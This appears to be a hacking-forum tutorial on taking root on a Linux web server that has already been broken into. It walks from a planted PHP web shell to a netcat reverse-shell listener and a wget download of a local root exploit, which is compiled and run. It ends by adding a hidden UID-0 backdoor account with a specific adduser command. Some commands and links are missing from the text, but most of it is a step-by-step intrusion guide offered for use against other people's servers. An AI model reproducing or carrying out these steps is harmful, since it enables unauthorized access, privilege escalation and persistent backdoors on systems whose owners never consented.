How To Root Server Tutorial By Dr@cul@

    Hi Freinds Iam Dr@cul@ ! welcome to a tutorial on how to root a linux server.
    This is going to be short,HQ tutorial (For better learning)
    So let's start with things you will need:
    1) Shelled website
    2) Local root exploit
    3) NetCat
    Chapter 1 - Gathering informations
    Open up your .php shell on a hacked webserver.
    I have mine for an example
    Now you need to check what kernel your slave is using...
    It should be something like
    Linux 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686
    Next thing you wanna do is to look for an local root exploit.
    From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.
    Here's the list of exploits
    NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.
    Chapter 2 - Backconnecting to the server
    For this you will need:
    1) NetCat
    2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)
    So open your netcat and type:
    -l -n -v -p 443
    Hit "Enter"
    Now it should write "listening on [any] 443 ..."
    Go back to your shell and go to "BackConnect function"
    Many shells have it.
    Enter your port and press "Connect".
    Now it should connect to your netcat
    I got something like this
    Chapter 3 - Downloading exploit and executing it
    Now we will need our exploit from Chapter 1
    There's 2 way of uploading:
    1) Using shell uploader
    2) Using 'wget' function (Requires backconnection)
    I'm going to use 'wget' function because it's easier and faster.
    So copy your exploit link (Mine one and go back to your netcat and type:
    Now it downloaded out exploit named "" on our server.
    If your exploit is downloaded as anyrandomname.c you must compile it
    Do do that first download that exploit and then type:
    gcc anyrandomname.c -o anyrandomname
    And our exploit is compiled. (If you get errors when compiling then find another exploit)
    If you downloaded your exploit in zip file type:
    Now you should have your exploit (Like mine "2.6.18-164")
    If you completed all steps it's time to get root.
    chmod 777 yourexploit'sname
    With common sense where i typed "yourexploit'sname" you will type your exploit's name.
    And one last final step is to run our exploit
    To check if you got root type
    Mine steps to root
    Chapter 4 - Adding root user
    Adding new root user is fairly easy
    We use this command:
    adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2
    Command explanations:
    Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.
    -u 0 -o - Set the value of user id to 0.
    -g 0 - Set the initial group number or name to 0
    -G 0,1,2,3,4,6,10 - Set supplementary group to:
    0 = root
    1 = bin
    2 = daemon
    3 = sys
    4 = adm
    6 = disk
    10 = wheel
    -M - 'home directory' not created for the user.
    root2 - User name of the new user account.NOTE: Change root2 to your desired username.
    Now you need to set a password for your username.
    Type in next:
    passwd Root2
    (Root2 is your username)
    See an example
    [root@fedora ~]# passwd root2
    Changing password for user root2.
    New UNIX password:
    Retype new UNIX password:
    passwd: all authentication tokens updated successfully.
    To check if you did alright
    id root2
    (Root2 is your username)
    GNY shell -
    Google -
    NetCat -
    So that concluded our rooting tutorial.
    I hope that someone will learn from this and that this thread will be bookmarked for generations